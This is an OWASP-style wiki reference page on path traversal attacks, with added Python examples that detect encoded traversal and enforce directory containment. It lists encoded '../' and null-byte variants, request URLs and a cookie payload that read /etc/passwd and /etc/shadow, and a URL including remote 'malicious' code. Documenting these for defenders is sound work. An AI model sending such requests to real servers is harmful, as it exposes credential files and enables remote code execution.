Path Traversal
Revision as of 12:05, 26 May 2009
This is an Attack. To view all attacks, please see the Attack Category page.
Last revision (mm/dd/yy): 05/26/2009
Overview
A Path Traversal attack aims to access files and directories that are stored outside the web root folder. By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with "dot-dot-slash (../)" sequences and their variations, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration and critical system files, limited only by the operating system's access control. The attacker uses "../" sequences to move up towards the root directory, thus permitting navigation through the file system.
This attack can also be executed with external malicious code injected into the path, as in the Resource Injection attack. No specific tool is needed to perform this attack; attackers typically use a spider/crawler to detect all available URLs.
This attack is also known as "dot-dot-slash", "directory traversal", "directory climbing" and "backtracking".
Related Security Activities
How to Avoid Path Traversal Vulnerabilities
See the OWASP Guide article on how to Avoid Path Traversal Vulnerabilities.
How to Test for Path Traversal Vulnerabilities
See the OWASP Testing Guide article on how to Test for Path Traversal Vulnerabilities.
Description
Request variations
Encoding and double encoding:
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\
and so on.
Percent encoding (aka URL encoding)
Note that web containers perform one level of decoding on percent encoded values from forms and URLs.
..%c0%af represents ../
..%c1%9c represents ..\
(The last two are non-canonical, "overlong" UTF-8 encodings of / and \, which a lenient decoder accepts as the separator.)
OS specific
UNIX
Root directory: "/"
Directory separator: "/"
WINDOWS
Root directory: "<partition letter>:\"
Directory separator: "/" or "\"
Note that Windows allows filenames to be followed by extra . \ / characters.
In many operating systems, null bytes %00 can be injected to terminate the filename. For example, sending a parameter like:
?file=secret.doc%00.pdf
will result in the Java application seeing a string that ends with ".pdf" and the operating system will see a file that ends in ".doc". Attackers may use this trick to bypass validation routines.
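To see how these variations all collapse to the same path once they are decoded the way the container and the operating system decode them, here is an added Python example (not OWASP's code) that canonicalizes a file-name parameter and lists the reasons it should be rejected; the function names, the OVERLONG table and the sample values are assumptions built from the encodings listed above.

```python
from typing import List, Tuple
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 forms listed above; each stands for a path separator (assumed table).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}


def canonicalize(param: str, max_rounds: int = 3) -> Tuple[bytes, bool]:
    """Return (canonical path, had_null_byte) for a raw request parameter.

    Percent-decoding repeats until the value stops changing, so double
    encoding (%252e -> %2e -> .) collapses. Overlong sequences become the
    separator they stand for, backslashes fold to '/', and the value is
    cut at the first NUL, which is what a C-level open() would see."""
    data = param.encode("ascii", errors="ignore")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for seq, sep in OVERLONG.items():
        data = data.replace(seq, sep)
    data = data.replace(b"\\", b"/")
    had_null = b"\x00" in data
    if had_null:
        data = data.split(b"\x00", 1)[0]
    return data, had_null


def traversal_findings(param: str) -> List[str]:
    """Reasons to reject the parameter; an empty list means it looks like a plain name."""
    path, had_null = canonicalize(param)
    findings = []
    if had_null:
        findings.append("null byte")
    # Absolute path traversal: UNIX '/' root or a Windows '<letter>:' root.
    if path.startswith(b"/") or (path[:1].isalpha() and path[1:2] == b":"):
        findings.append("absolute path")
    if any(segment == b".." for segment in path.split(b"/")):
        findings.append("dot-dot segment")
    return findings


if __name__ == "__main__":
    # Constructed sample values, mostly taken from the variations listed above.
    for sample in ("report.pdf", "../../../../some dir/some file",
                   "%252e%252e%255csome file", "..%c0%af..%c0%afetc/passwd",
                   "secret.doc%00.pdf", "/etc/passwd"):
        print(repr(sample), "->", traversal_findings(sample) or ["ok"])
```

Decoding is repeated on purpose: a check that decodes once, as the container does, is exactly what the double-encoded forms above are built to slip past.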
Examples
Example 1
The following examples show how the application deals with the resources in use.
http://some_site.com.br/get-files.jsp?file=report.pdf
http://some_site.com.br/get-page.php?home=aaa.html
http://some_site.com.br/some-page.asp?page=index.html
In these examples it's possible to insert a malicious string as the variable parameter to access files located outside the web publish directory.
http://some_site.com.br/get-files?file=../../../../some dir/some file
http://some_site.com.br/../../../../some dir/some file
The following URLs show examples of *NIX password file exploitation.
http://some_site.com.br/../../../../etc/shadow
http://some_site.com.br/get-files?file=/etc/passwd
Note: On a Windows system an attacker can navigate only within the partition that holds the web root, while on Linux the whole file system is reachable.
Example 2
It's also possible to include files and scripts located on an external website.
http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php
Example 3
This example illustrates a case where the attacker makes the server return the CGI script's own source code.
http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi
Example 4
This example was extracted from: Wikipedia - Directory Traversal
A typical example of vulnerable application code is:
<?php
$template = 'blue.php';
if ( isset( $_COOKIE['TEMPLATE'] ) )
    $template = $_COOKIE['TEMPLATE'];
include ( "/home/users/phpguru/templates/" . $template );
?>
An attack against this system could be to send the following HTTP request:
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
Generating a server response such as:
HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh
daemon:*:1:1::/tmp:
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh
The repeated ../ sequences after /home/users/phpguru/templates/ have caused include() to traverse to the root directory and then include the UNIX password file /etc/passwd.
The UNIX /etc/passwd file is commonly used to demonstrate directory traversal, as it is often targeted by crackers trying to crack the passwords.
Absolute Path Traversal
The following URLs may be vulnerable to this attack:
http://testsite.com/get.php?f=list
http://testsite.com/get.cgi?f=2
http://testsite.com/get.asp?f=test
An attacker can execute this attack like this:
http://testsite.com/get.php?f=/var/www/html/get.php
http://testsite.com/get.cgi?f=/var/www/html/admin/get.inc
http://testsite.com/get.asp?f=/etc/passwd
When the web server returns information about errors in a web application, it is much easier for the attacker to guess the correct locations (e.g. the path to a file containing source code, which may then be displayed).
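The fix for both the template include in Example 4 and the absolute paths above is the same: resolve the requested name against the intended directory and refuse anything that ends up outside it. Here is an added Python counterpart of the PHP include (not OWASP's or Wikipedia's code); `resolve_template`, `demo` and the constructed directory tree are assumptions.

```python
import os
import tempfile
from typing import Dict


def resolve_template(base_dir: str, name: str) -> str:
    """Return the real path of `name` inside `base_dir`, or raise ValueError.

    The name is rejected if it carries a NUL (a C-level open() would stop
    there) or if, after os.path.realpath collapses '..' and symlinks, it
    lands outside base_dir. os.path.join drops base_dir when `name` is
    absolute, so the same containment check also stops absolute path
    traversal such as f=/etc/passwd."""
    if "\x00" in name:
        raise ValueError("null byte")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    # commonpath, not startswith: '/srv/tpl2/x' must not pass for base '/srv/tpl'.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("outside base")
    if not os.path.isfile(target):
        raise ValueError("no such template")
    return target


def demo() -> Dict[str, str]:
    """Build a constructed tree and run the page's inputs through the check."""
    root = tempfile.mkdtemp()
    tpl = os.path.join(root, "templates")
    os.mkdir(tpl)
    with open(os.path.join(tpl, "blue.php"), "w") as f:
        f.write("<p>blue</p>")
    with open(os.path.join(root, "secret.txt"), "w") as f:  # outside base_dir
        f.write("root:x:0:0::/:/bin/sh\n")
    cases = {
        "default": "blue.php",
        "cookie": "../../../../../../../../../etc/passwd",  # the TEMPLATE cookie above
        "sibling": "../secret.txt",
        "absolute": os.path.join(root, "secret.txt"),
        "null": "blue.php\x00.txt",
        "missing": "red.php",
    }
    outcome = {}
    for label, name in cases.items():
        try:
            resolve_template(tpl, name)
            outcome[label] = "allowed"
        except ValueError as err:
            outcome[label] = "rejected: " + str(err)
    return outcome


if __name__ == "__main__":
    for label, result in demo().items():
        print(label, "->", result)
```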